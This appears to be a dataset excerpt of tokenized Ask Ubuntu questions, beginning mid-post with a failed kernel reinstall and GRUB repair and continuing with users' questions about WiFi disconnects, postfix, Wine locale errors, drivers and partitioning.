//de.archive.ubuntu.com trusty-backports/universe i386 packages [ 4,114 b ] get:49 http : //de.archive.ubuntu.com trusty-backports/multiverse i386 packages [ 619 b ] hit http : //de.archive.ubuntu.com trusty-backports/main translation-en get:50 http : //de.archive.ubuntu.com trusty-backports/multiverse translation-en [ 307 b ] hit http : //de.archive.ubuntu.com trusty-backports/restricted translation-en get:51 http : //de.archive.ubuntu.com trusty-backports/universe translation-en [ 2,506 b ] get:52 http : //de.archive.ubuntu.com trusty-proposed/main amd64 packages [ 88.4 kb ] get:53 http : //de.archive.ubuntu.com trusty-proposed/restricted amd64 packages [ 14 b ] get:54 http : //de.archive.ubuntu.com trusty-proposed/multiverse amd64 packages [ 14 b ] get:55 http : //de.archive.ubuntu.com trusty-proposed/universe amd64 packages [ 16.6 kb ] get:56 http : //de.archive.ubuntu.com trusty-proposed/main i386 packages [ 85.5 kb ] get:57 http : //de.archive.ubuntu.com trusty-proposed/restricted i386 packages [ 14 b ] get:58 http : //de.archive.ubuntu.com trusty-proposed/multiverse i386 packages [ 14 b ] get:59 http : //de.archive.ubuntu.com trusty-proposed/universe i386 packages [ 16.7 kb ] get:60 http : //de.archive.ubuntu.com trusty-proposed/main translation-en [ 40.7 kb ] hit http : //de.archive.ubuntu.com trusty-proposed/main translation-de hit http : //de.archive.ubuntu.com trusty-proposed/multiverse translation-en hit http : //de.archive.ubuntu.com trusty-proposed/multiverse translation-de hit http : //de.archive.ubuntu.com trusty-proposed/restricted translation-en hit http : //de.archive.ubuntu.com trusty-proposed/restricted translation-de get:61 http : //de.archive.ubuntu.com trusty-proposed/universe translation-en [ 10.4 kb ] hit http : //de.archive.ubuntu.com trusty-proposed/universe translation-de ign http : //de.archive.ubuntu.com trusty/main translation-en_us ign http : //de.archive.ubuntu.com trusty/multiverse translation-en_us ign http : //de.archive.ubuntu.com trusty/restricted translation-en_us ign http : //de.archive.ubuntu.com trusty/universe translation-en_us ign http : //de.archive.ubuntu.com trusty-updates/main translation-en_us ign http : //de.archive.ubuntu.com trusty-updates/main translation-de ign http : //de.archive.ubuntu.com trusty-updates/multiverse translation-en_us ign http : //de.archive.ubuntu.com trusty-updates/multiverse translation-de ign http : //de.archive.ubuntu.com trusty-updates/restricted translation-en_us ign http : //de.archive.ubuntu.com trusty-updates/restricted translation-de ign http : //de.archive.ubuntu.com trusty-updates/universe translation-en_us ign http : //de.archive.ubuntu.com trusty-updates/universe translation-de ign http : //de.archive.ubuntu.com trusty-backports/main translation-en_us ign http : //de.archive.ubuntu.com trusty-backports/main translation-de ign http : //de.archive.ubuntu.com trusty-backports/multiverse translation-en_us ign http : //de.archive.ubuntu.com trusty-backports/multiverse translation-de ign http : //de.archive.ubuntu.com trusty-backports/restricted translation-en_us ign http : //de.archive.ubuntu.com trusty-backports/restricted translation-de ign http : //de.archive.ubuntu.com trusty-backports/universe translation-en_us ign http : //de.archive.ubuntu.com trusty-backports/universe translation-de ign http : //de.archive.ubuntu.com trusty-proposed/main translation-en_us ign http : //de.archive.ubuntu.com trusty-proposed/multiverse translation-en_us ign http : //de.archive.ubuntu.com trusty-proposed/restricted translation-en_us ign http : //de.archive.ubuntu.com trusty-proposed/universe translation-en_us fetched 1,250 kb in 8s ( 145 kb/s ) reading package lists ... done root @ ubuntu : / # then i 've entered : root @ ubuntu : / # apt-get -- reinstall install linux-image-3.11.0-20-generic ... and got the following reply : reading package lists ... done building dependency tree reading state information ... done reinstallation of linux-image-3.11.0-20-generic is not possible , it can not be downloaded . the following package was automatically installed and is no longer required : linux-image-generic use 'apt-get autoremove ' to remove it . 0 upgraded , 0 newly installed , 0 to remove and 1674 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up icaclient ( 12.1.0 ) ... /var/lib/dpkg/info/icaclient.postinst : 696 : /var/lib/dpkg/info/icaclient.postinst : nspluginwrapper : not found dpkg : error processing icaclient ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : icaclient e : sub-process /usr/bin/dpkg returned an error code ( 1 ) next i 've entered : root @ ubuntu : / # update-grub system replied : generating grub.cfg ... found linux image : /boot/vmlinuz-3.11.0-20-generic found linux image : /boot/vmlinuz-3.11.0-19-generic found linux image : /boot/vmlinuz-3.11.0-18-generic found linux image : /boot/vmlinuz-3.11.0-17-generic found linux image : /boot/vmlinuz-3.11.0-15-generic found linux image : /boot/vmlinuz-3.11.0-12-generic found memtest86+ image : /memtest86+.bin done then i 've entered : root @ ubuntu : / # grub-install and got this : install device is n't specified . usage : grub-install [ option ] [ install_device ] install grub on your drive . -h , -- help print this message and exit -v , -- version print the version information and exit -- modules=modules pre-load specified modules modules -- boot-directory=dir install grub images under the directory dir/grub instead of the /boot/grub directory -- target=target install grub for target platform [ default=current ] -- directory=dir use grub images from dir . takes precedence over target -- grub-setup=file use file as grub-setup -- grub-mkimage=file use file as grub-mkimage -- grub-mkrelpath=file use file as grub-mkrelpath -- grub-probe=file use file as grub-probe -- allow-floppy make the drive also bootable as floppy ( default for fdx devices ) . may break on some bioses . -- recheck delete device map if it already exists -- force install even if problems are detected -- force-file-id use identifier file even if uuid is available -- disk-module=module disk module to use ( biosdisk or native ) . this option is only available on bios target . -- no-nvram do n't update the `boot-device ' nvram variable . this option is only available on ieee1275 targets . -- removable the installation device is removable . this option is only available on efi . -- bootloader-id=id the id of bootloader . this option is only available on efi . -- efi-directory=dir use dir as the efi system partition root . -- uefi-secure-boot install an image usable with uefi secure boot . this option is only available on efi and if the grub-efi-amd64-signed package is installed . -- no-uefi-secure-boot do not install an image usable with uefi secure boot , even if the system was currently started using it . this option is only available on efi . install_device must be system device filename . grub-install copies grub images into /boot/grub , and uses grub-setup to install grub into the boot sector . report bugs to < bug-grub @ gnu.org > . as you can see above the procedure has shown some errors . the result is that the system still does n't boot . does someone have an idea about how to resolve the errors ?
465829	pausing a long running program in the terminal ?	is there a keyboard key combination that i can use to pause a program running in the terminal ? in case it matters , i do n't intend to run anything else inside that terminal while to program is paused . i just want to pause the program execution , and resume it later . how can i do this ?
465830	firefox + okular as `` embedded '' pdf viewer with mozplugger : unable to search into the pdf	i am rather fan of okular software to view pdf . so that i am using it as embeded pdf viewer in to firefox web browser . i prefer it over the default pdf viewer of firefox and adobe reader . however , since months i use the okular option , i have noticed that i am not able the search for string into the document : ctrl+f shortcut activates the firefox search search via the okular menu toggles the search field but i am unable to provide any string input . i wanted to know if there is any way to circumvent this ? ( i have tested the same point with adobre reader as pdf viewer , there it works as expected ) cheers ( kubuntu 14.04 , kde 4.13 )
465831	how do i install the video driver for my toshiba satellite on 14.04 ?	i 'm having lag in images and movies that i did n't in windows . i think this might be a driver issue , what driver do i need to install , and how do i do it ? my laptop is toshiba satellite with ati xpress 200m .
465836	postfix goes crazy . deletes and terminates itself	iam just trying to get a npl ts3 license . installed and configured postfix in its simplest way to receive only a few emails . but after some minutes , sometimes seconds postfix process is no longer running so i cant receive emails ( it is possible in the first 2 minutes or so ) . this is fail number one . but then the master executable in /usr/lib/postfix/ is deleted so i have to reinstall or copy mybackup of master executable in to the directory to restart postfix . pls help me . postfix is running fine , but i need to be able to receive the email with the key . thank you and sorry for my school english ... kilian
465838	why does vim highlight javadoc comments like this ?	i am using vim to edit java code . i added a javadoc header above the class definition , but the syntax highlighting is very strange : read the javadoc comment above why is the first sentence highlighted white while the rest is highlighted gray ?
465841	installing packages ( using synaptic ) failing	i am trying to ( re ) install sfcb using the synaptic package manager . when i do so i get : ( synaptic:3969 ) : glib-critical ** : g_child_watch_add_full : assertion 'pid > 0 ' failed ( reading database ... 180699 files and directories currently installed . ) preparing to unpack ... /sfcb_1.4.6-0ubuntu4_i386.deb ... * stopping the small footprint cim broker ( sfcb ) [ ok ] unpacking sfcb ( 1.4.6-0ubuntu4 ) over ( 1.4.6-0ubuntu4 ) ... processing triggers for ureadahead ( 0.100.0-16 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... setting up slpd ( 1.2.1-9 ) ... + [ configure = configure ] + dpkg -- compare-versions le 1.2.1-7.6 + echo reinstalling init script for new priorities ... reinstalling init script for new priorities ... + update-rc.d slpd remove update-rc.d : /etc/init.d/slpd exists during rc.d purge ( use -f to force ) dpkg : error processing package slpd ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up sfcb ( 1.4.6-0ubuntu4 ) ... sf format being used . * starting the small footprint cim broker ( sfcb ) [ ok ] errors were encountered while processing : slpd e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up slpd ( 1.2.1-9 ) ... + [ configure = configure ] + dpkg -- compare-versions le 1.2.1-7.6 + echo reinstalling init script for new priorities ... reinstalling init script for new priorities ... + update-rc.d slpd remove update-rc.d : /etc/init.d/slpd exists during rc.d purge ( use -f to force ) dpkg : error processing package slpd ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : slpd
465847	installing tinycore to compact flash : grub not found	i 've been following this tutorial : installing tinycore on to a compact flash card . everything goes fine until i get to this part : grub -- device-map=grub-device.map where i get an error : grub is not installed . i 've tried this command : apt-cache policy grub2 grub-pc and the output is : grub2 : installed : none grub-pc : installed : none i ca n't understand what is happening . i 've tried : apt-get update apt-get purge grub grub-pc grub-common and then : apt-get install grub-common grub-pc update-grub but it does n't work at all . could someone help me or suggest something ?
465848	frequent deauthentication from wifi ( reason : 6 ) in ubuntu 14.04	for a few days now , my wifi is getting disrupted every few minutes . i use a 'vanilla ' ubuntu installation ( i.e unity , networkmanager etc. ) . after an hour or so , the connection gets severed completely and networkmanager ca n't find the network anymore . toggling `` enable wi-fi '' in the networkmanager-menu allows me to find and connect to the network again . this is an excerpt from /var/log/syslog : may 14 16:50:51 terminus kernel : [ 4208.006043 ] wlan0 : deauthenticated from 00:24 : fe : a3:98 : f6 ( reason : 6 ) may 14 16:50:51 terminus wpa_supplicant [ 907 ] : wlan0 : ctrl-event-disconnected bssid=00:24 : fe : a3:98 : f6 reason=6 may 14 16:50:51 terminus networkmanager [ 868 ] : connection disconnected ( reason 6 ) may 14 16:50:51 terminus wpa_supplicant [ 907 ] : wlan0 : sme : trying to authenticate with 00:24 : fe : a3:98 : f6 ( ssid='fritz ! box fon wlan 7270 ' freq=2447 mhz ) may 14 16:50:51 terminus kernel : [ 4208.034507 ] cfg80211 : calling crda to update world regulatory domain may 14 16:50:51 terminus kernel : [ 4208.035050 ] wlan0 : authenticate with 00:24 : fe : a3:98 : f6 may 14 16:50:51 terminus kernel : [ 4208.042178 ] wlan0 : send auth to 00:24 : fe : a3:98 : f6 ( try 1/3 ) may 14 16:50:51 terminus networkmanager [ 868 ] : ( wlan0 ) : supplicant interface state : completed - > authenticating may 14 16:50:51 terminus wpa_supplicant [ 907 ] : wlan0 : trying to associate with 00:24 : fe : a3:98 : f6 ( ssid='fritz ! box fon wlan 7270 ' freq=2447 mhz ) may 14 16:50:51 terminus kernel : [ 4208.042526 ] cfg80211 : world regulatory domain updated : may 14 16:50:51 terminus kernel : [ 4208.042533 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) may 14 16:50:51 terminus kernel : [ 4208.042539 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 14 16:50:51 terminus kernel : [ 4208.042543 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 14 16:50:51 terminus kernel : [ 4208.042547 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) may 14 16:50:51 terminus kernel : [ 4208.042550 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 14 16:50:51 terminus kernel : [ 4208.042554 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 14 16:50:51 terminus kernel : [ 4208.044622 ] wlan0 : authenticated may 14 16:50:51 terminus kernel : [ 4208.046291 ] wlan0 : associate with 00:24 : fe : a3:98 : f6 ( try 1/3 ) may 14 16:50:51 terminus networkmanager [ 868 ] : ( wlan0 ) : supplicant interface state : authenticating - > associating may 14 16:50:51 terminus kernel : [ 4208.056055 ] wlan0 : rx assocresp from 00:24 : fe : a3:98 : f6 ( capab=0x431 status=0 aid=1 ) may 14 16:50:51 terminus wpa_supplicant [ 907 ] : wlan0 : associated with 00:24 : fe : a3:98 : f6 may 14 16:50:51 terminus kernel : [ 4208.065893 ] wlan0 : associated may 14 16:50:51 terminus networkmanager [ 868 ] : ( wlan0 ) : supplicant interface state : associating - > 4-way handshake may 14 16:50:51 terminus wpa_supplicant [ 907 ] : wlan0 : wpa : key negotiation completed with 00:24 : fe : a3:98 : f6 [ ptk=ccmp gtk=tkip ] may 14 16:50:51 terminus wpa_supplicant [ 907 ] : wlan0 : ctrl-event-connected - connection to 00:24 : fe : a3:98 : f6 completed [ id=0 id_str= ] may 14 16:50:51 terminus networkmanager [ 868 ] : ( wlan0 ) : supplicant interface state : 4-way handshake - > completed may 14 16:51:55 terminus wpa_supplicant [ 907 ] : wlan0 : ctrl-event-scan-started may 14 16:52:27 terminus kernel : [ 4304.188238 ] wlan0 : deauthenticated from 00:24 : fe : a3:98 : f6 ( reason : 6 ) may 14 16:52:27 terminus wpa_supplicant [ 907 ] : wlan0 : ctrl-event-disconnected bssid=00:24 : fe : a3:98 : f6 reason=6 may 14 16:52:27 terminus networkmanager [ 868 ] : connection disconnected ( reason 6 ) may 14 16:52:27 terminus wpa_supplicant [ 907 ] : wlan0 : sme : trying to authenticate with 00:24 : fe : a3:98 : f6 ( ssid='fritz ! box fon wlan 7270 ' freq=2447 mhz ) may 14 16:52:27 terminus kernel : [ 4304.215024 ] cfg80211 : calling crda to update world regulatory domain may 14 16:52:27 terminus kernel : [ 4304.215540 ] wlan0 : authenticate with 00:24 : fe : a3:98 : f6 may 14 16:52:27 terminus networkmanager [ 868 ] : ( wlan0 ) : supplicant interface state : completed - > authenticating may 14 16:52:27 terminus wpa_supplicant [ 907 ] : wlan0 : trying to associate with 00:24 : fe : a3:98 : f6 ( ssid='fritz ! box fon wlan 7270 ' freq=2447 mhz ) may 14 16:52:27 terminus kernel : [ 4304.219680 ] wlan0 : send auth to 00:24 : fe : a3:98 : f6 ( try 1/3 ) may 14 16:52:27 terminus kernel : [ 4304.222003 ] wlan0 : authenticated may 14 16:52:27 terminus kernel : [ 4304.222790 ] wlan0 : associate with 00:24 : fe : a3:98 : f6 ( try 1/3 ) may 14 16:52:27 terminus kernel : [ 4304.223063 ] cfg80211 : world regulatory domain updated : may 14 16:52:27 terminus kernel : [ 4304.223072 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) may 14 16:52:27 terminus kernel : [ 4304.223078 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 14 16:52:27 terminus kernel : [ 4304.223083 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 14 16:52:27 terminus kernel : [ 4304.223087 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) may 14 16:52:27 terminus kernel : [ 4304.223090 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 14 16:52:27 terminus kernel : [ 4304.223094 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 14 16:52:27 terminus kernel : [ 4304.226833 ] wlan0 : rx assocresp from 00:24 : fe : a3:98 : f6 ( capab=0x431 status=0 aid=1 ) may 14 16:52:27 terminus networkmanager [ 868 ] : ( wlan0 ) : supplicant interface state : authenticating - > associating may 14 16:52:27 terminus wpa_supplicant [ 907 ] : wlan0 : associated with 00:24 : fe : a3:98 : f6 may 14 16:52:27 terminus kernel : [ 4304.232953 ] wlan0 : associated may 14 16:52:27 terminus networkmanager [ 868 ] : ( wlan0 ) : supplicant interface state : associating - > 4-way handshake may 14 16:52:27 terminus wpa_supplicant [ 907 ] : wlan0 : wpa : key negotiation completed with 00:24 : fe : a3:98 : f6 [ ptk=ccmp gtk=tkip ] may 14 16:52:27 terminus wpa_supplicant [ 907 ] : wlan0 : ctrl-event-connected - connection to 00:24 : fe : a3:98 : f6 completed [ id=0 id_str= ] may 14 16:52:27 terminus networkmanager [ 868 ] : ( wlan0 ) : supplicant interface state : 4-way handshake - > completed may 14 16:53:55 terminus wpa_supplicant [ 907 ] : wlan0 : ctrl-event-scan-started may 14 16:54:00 terminus wpa_supplicant [ 907 ] : nl80211 : send_and_recv- > nl_recvmsgs failed : -33 may 14 16:54:05 terminus wpa_supplicant [ 907 ] : wlan0 : wpa : group rekeying completed with 00:24 : fe : a3:98 : f6 [ gtk=tkip ] other relevant information : root @ terminus : ~ # lshw -c network *-network description : wireless interface product : centrino advanced-n 6230 [ rainbow peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 34 serial : 88:53:2e:42:0b:71 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-24-generic firmware=18.168.6.1 ip=192.168.3.22 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:52 memory : f1b00000-f1b01fff root @ terminus : ~ # lsmod module size used by btrfs 835954 0 raid6_pq 97812 1 btrfs xor 21411 1 btrfs ufs 74890 0 qnx4 13317 0 hfsplus 107516 0 hfs 54677 0 minix 36140 0 ntfs 97369 0 msdos 17332 0 jfs 181348 0 xfs 912173 0 libcrc32c 12644 2 xfs , btrfs ctr 13049 1 ccm 17773 1 nls_iso8859_1 12713 0 snd_hda_codec_hdmi 46207 1 snd_hda_codec_realtek 61438 1 joydev 17381 0 intel_rapl 18773 0 x86_pkg_temp_thermal 14205 0 intel_powerclamp 14705 0 coretemp 13435 0 kvm_intel 143060 0 kvm 451511 1 kvm_intel dell_laptop 18168 0 dcdbas 14928 1 dell_laptop crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ghash_clmulni_intel 13259 0 aesni_intel 55624 2 uvcvideo 80885 0 aes_x86_64 17131 1 aesni_intel lrw 13286 1 aesni_intel gf128mul 14951 1 lrw videobuf2_vmalloc 13216 1 uvcvideo glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel videobuf2_memops 13362 1 videobuf2_vmalloc cryptd 20359 3 ghash_clmulni_intel , aesni_intel , ablk_helper psmouse 102222 0 videobuf2_core 40664 1 uvcvideo serio_raw 13462 0 videodev 134688 2 uvcvideo , videobuf2_core rfcomm 69160 8 arc4 12608 2 bnep 19624 2 snd_hda_intel 52355 3 iwldvm 232285 0 snd_hda_codec 192906 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel mac80211 626489 1 iwldvm nouveau 1097199 1 snd_hwdep 13602 1 snd_hda_codec snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel btusb 32412 0 snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi bluetooth 395423 22 bnep , btusb , rfcomm iwlwifi 169932 1 iwldvm snd_rawmidi 30144 1 snd_seq_midi i915 783485 3 dell_wmi 12761 0 lpc_ich 21080 0 sparse_keymap 13948 1 dell_wmi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi mxm_wmi 13021 1 nouveau snd_timer 29482 2 snd_pcm , snd_seq cfg80211 484040 3 iwlwifi , mac80211 , iwldvm ttm 85115 1 nouveau snd 69238 17 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi drm_kms_helper 52758 2 i915 , nouveau wmi 19177 3 dell_wmi , mxm_wmi , nouveau drm 302817 7 ttm , i915 , drm_kms_helper , nouveau i2c_algo_bit 13413 2 i915 , nouveau soundcore 12680 1 snd mei_me 18627 0 mei 82274 1 mei_me mac_hid 13205 0 video 19476 2 i915 , nouveau parport_pc 32701 0 ppdev 17671 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc hid_generic 12548 0 usbhid 52616 0 hid 106148 2 hid_generic , usbhid usb_storage 62209 0 ahci 25819 1 r8169 67581 0 libahci 32168 1 ahci mii 13934 1 r8169 i guess it could be a hardware-related issue , but as far as i know , the problem does not occur on windows ( 8 , 64bit ) . however , since the reconnect is so fast , i might have missed it so far . any idea what the issue could be ? what is `` reason 6 '' and what can cause it ? how can i debug the problem further ? thanks ! edit : it seems like 1network issues since trusty could be the same issue . i would appreciate if someone could post my link there , since i do n't have enough reputation to do so . update : i disabled mode-n wireless by adding 'options iwlwifi 11n_disable=1 ' to some file in /etc/modprobe.d/ . i had no disconnects since then !
465850	sudo adduser to set default directory	i used sudo adduser to add a new user for webmaster , so i set home directory to /var/www to let this user have rights to save file on the web server . i just realized that i use webmaster account to log in the computer , ubuntu created all directory for home like documents , download folders etc ... since those folders ubuntu created on the /var/www folder are public folder , i would like to know can i delete those folders or i have leave there for the folders system created . your help and information is great appreciated , regards , inung
465851	unetbootin ca n't recognize usb after it 's mounted	i 'm wondering if anyone has this problem ? i mounted a usb drive formatted as fat32 to a directory , but unetbootin still could n't recognize it . i 'm using ubuntu 14.04 . and also i could n't see the usb as a removable device ( like other usb drives ... ) does anyone know why ?
465852	gnome shell extenstions have to be turned back on after reboot	whenever i reboot my system ( ubuntu 14.04 with gnome 3.12 ) all the gnome shell extensions turn off . i can just re-enable them and they work fine until i reboot again . what can i do to make gnome restart the same shell extensions on startup ?
465857	file system type and swap partition during installation	first of all i’m a total newbie with linux , and after another disappointment from microsoft with failure to maintain backwards compatibility for my xp applications i’m ready to give linux with wine a try . about my system : out of the box dell vostro 200 processor : intel core 2 duo cpu e7200 @ 2.53ghz x2 , 64-bit memory : 2gb graphics : intel g33 ( integrated ) please forgive me if this is repeat post , but after much research i’m a bit confused . my questions pertain to the default installation for a standalone linux system . i did format the hard drive as nfts with only one partition and did the standalone installation . after the installation i noticed that my hard drive file system type had changed to ext4 and there is now 3 partitions ; partition 1 is 158g ext4 partition 2 is 2.1g ( not sure of the file system ) partition 3 ( shown as partition 5 ) is 2.1g swap to me this indicates that the ubuntu 14.04 installation reformatted the hard drive , changed the file systems and partitioned the hard drive . after the fact my research showed that this is the default configuration for a standalone linux system . question 1 ) i’m fine with and actually prefer this . but does this mean i could have save ~1 hour by not formatting the hard drive ? question 2 ) does this mean my linux-swap is fully configured and i can avoid using gparted ? question 3 ) where is the other two partitions , and why did the installation use 1,2 and 5 ? thanks
465858	how do i install a second disk of a pc game ?	on a few pc games , they take 2 disks to install . i have lububtu , and am trying to use wine to install them , which works fine , until it asks for the second disk . i put it in , and it says that there are no files on that disk , and make sure i have the right disk . there is also a box that lets me type in what file i want to use . any suggestions ?
465865	help remove unknown partition from an ubuntu 14.04 overwrite of win 8.1 on acer desktop	new at using script . unable to remove partition without detailed instructions from someone who knows . [ google ] [ google ] looking into this matter myself . i discovered this partition my be a swap partition . if ubuntu makes a swap partition on new install equal to ram ; that is marked unknown , than all i need is to confirm this . found my problem . i have the rootkit ( suckit ) on my new computer . i will post a new question , help remove rootkit ( suckit ) .
465868	disk encryption with lubuntu ?	i am thinking of installing lubuntu 14.04 on top of my current ubuntu 14.04 installation . i have ( and for professional reasons , require ) full-disk encryption , so i have been researching this before proceeding with the installation . i have found this mention of a bug , though in a previous release : https : //bugs.launchpad.net/ubuntu/+bug/1241833 can anyone tell me whether this has been rectified or whether it is still an issue ? ( if so , my plan is essentially thwarted . ) thanks .
465869	dell 1250c drivers loaded in 14.04lst but wo n't print	i am running xubuntu 14.04lts 64 on an acer extersa 4620z . i downloaded the xerox 6000/6010 .deb package and tried to install it . at the end of the install , the `` install '' button returned in the software manager as if the install did not complete . i did some research and found out that it was a 32-bit driver and the support for allowing that kind of install is long gone . i went back to the xerox website and saw that the rpm is supposed to have 64bit support . i used alien and converted the .rpm over to .deb and installed using dpkg . no errors ! i went in , plugged in my printer , loaded the driver , and started a test page ! and nothing happened ... . any suggestions on how to troubleshoot this problem ?
465874	can not install packages in ubuntu on vmware player under windows 7 as a host machine	i have windows 7 as a host machine . i installed ubuntu 12.04 on vmware player . but i can not install any packages in ubuntu . it seems that windows 7 firewall blocks any attempts to install packages for ubuntu . the picture looks like this . xxx.xx.xx.13 here is ip address it wants to connect . my host machine ipv4 address is the same but the last three figures are xxx.xx.xx.113 : admin1 @ ubuntu : ~ $ sudo apt-get update [ sudo ] password for admin1 : 0 % [ connecting to xxx.xx.xx.13 ( xxx.xx.xx.13 ) ] [ connecting to xxx.xx.xx.13 ( xxx.xx.xx.13 ) ] [ connecting to xxx.xx.xx.13 err http : //extras.ubuntu.com precise release.gpg could not connect to xxx.xx.xx.13:80 ( xxx.xx.xx.13 ) . - connect ( 111 : connection refused ) i use default nat settings of vmware . i 'm not strong in network settings and actually do not understand what is going on and how to set the settings right way . i tried to turn off firewall at all but it did n't help . any information or links where i can read some basics of network setting of vmware , of firewall and how to set them all together would be very appreciated . is it firewall issue ? is it vmware network settings issue ? is it ubuntu network settings issue ? is it apt-get config settings issue ?
465876	my bios does not support booting from usb	hello i got an old computer and i want to put linux on it but the bios does not boot from usb.i do not have a blank cd my cd player is not a burner is there still hope for me . thank you for taking your time to read this .
465877	how to move one file to a folder using terminal ?	i want to move one file to a folder using terminal . how do i do this ?
465878	how to use time command in bash , to sum sys + user time , and output it as milliseconds ?	the time command returns a table like this ? real 0m1.607s user 0m0.154s sys 0m0.032s i am running this inside a shell script . what 's the simplest way to process time output so that i get a variable $ runtime wich holds the sum user + sys in milliseconds ?
465880	how to send files to the trash can without the confirmation dialog	if i delete a file , the following message appears on the screen : how could disable that message and send the file straight to the trash can ?
465885	help with wine-1.6.2	what i have : 1 pc with windows xp ( server ) 1 pc with windows 7 ( client 1 ) 1 pc with lubuntu 14.10 and wine-1.6.2 this is locale command output : lang=es_ve.utf-8 language=es_ve : en lc_ctype= '' es_ve.utf-8 '' lc_numeric=es_ve.utf-8 lc_time=es_ve.utf-8 lc_collate= '' es_ve.utf-8 '' lc_monetary=es_ve.utf-8 lc_messages= '' es_ve.utf-8 '' lc_paper=es_ve.utf-8 lc_name=es_ve.utf-8 lc_address=es_ve.utf-8 lc_telephone=es_ve.utf-8 lc_measurement=es_ve.utf-8 lc_identification=es_ve.utf-8 lc_all= this is my regedit : [ control panel\\international ] 1399488839 '' icalendartype '' = '' 1 '' '' icountry '' = '' 58 '' '' icurrdigits '' = '' 2 '' '' icurrency '' = '' 2 '' '' idate '' = '' 1 '' '' idigits '' = '' 2 '' '' ifirstdayofweek '' = '' 6 '' '' ifirstweekofyear '' = '' 0 '' '' ildate '' = '' 0 '' '' ilzero '' = '' 1 '' '' imeasure '' = '' 0 '' '' inegcurr '' = '' 12 '' '' inegnumber '' = '' 1 '' '' ipapersize '' = '' 1 '' '' itime '' = '' 0 '' '' itimeprefix '' = '' 0 '' '' itlzero '' = '' 1 '' '' lc_ctype '' = '' 0000200a '' '' lc_measurement '' = '' 0000200a '' '' lc_monetary '' = '' 0000200a '' '' lc_numeric '' = '' 0000200a '' '' lc_paper '' = '' 0000200a '' '' lc_telephone '' = '' 0000200a '' '' lc_time '' = '' 0000200a '' '' locale '' = '' 0000200a '' '' numshape '' = '' 1 '' '' s1159 '' = '' a.m. '' '' s2359 '' = '' p.m. '' '' scountry '' = '' venezuela '' '' scurrency '' = '' bs '' '' sdate '' = '' / '' '' sdecimal '' = '' , '' '' sgrouping '' = '' 3 ; 0 '' '' slanguage '' = '' esv '' '' slist '' = '' , '' '' slongdate '' = '' dddd , dd ' de 'mmmm ' de 'yyyy '' '' smondecimalsep '' = '' , '' '' smongrouping '' = '' 3 ; 0 '' '' smonthousandsep '' = '' . '' `` snativedigits '' = '' 0123456789 '' '' snegativesign '' = '' - '' '' spositivesign '' = '' '' '' sshortdate '' = '' dd/mm/yyyy '' '' sthousand '' = '' . '' `` stime '' = '' : '' '' stimeformat '' = '' hh : mm : ss tt '' '' syearmonth '' = '' mmmm ' de 'yyyy '' the problem : i am using an administrative software made under ms acess 2003 ( sfp.exe ) . whenever i run the software in my lubuntu pc , all the prices are wrong . for example , i have a product called “escoba arauca” . each box cost 293.00 . the system shows -28.00 , multiplied by 1 = 2,800.00 . it should be 293 x 1 = 293 . it is obvious i am doing something wrong but i don’t know what else to do . this is my 3erd week surfing the web searching for answers but no luck for now . under windows works fine . i tried to upload the screen shots of the system running under windows 7 and under lubuntu but i do n't have 10 reputations . thank you very much for your help . ps : it is good to let you know that if i read an already made invoice made from any windows computer , the prices are ok . so , reading the tables do n't cause any problem . this wrong numbers comes when i am making the invoice from my lubuntu pc . i guess that the problem comes when there are some calculations to do . in example : the prices is the result of this math operation : cost + profit . i have another screen shot showing that the products prices are ok , but somehow they are multiplied by 100 instead of 1 . i ca n't post it neither , sorry . so , every time math is involved , results are wrong . i use coma ( , ) for decimals and the dot ( . ) for thousands .
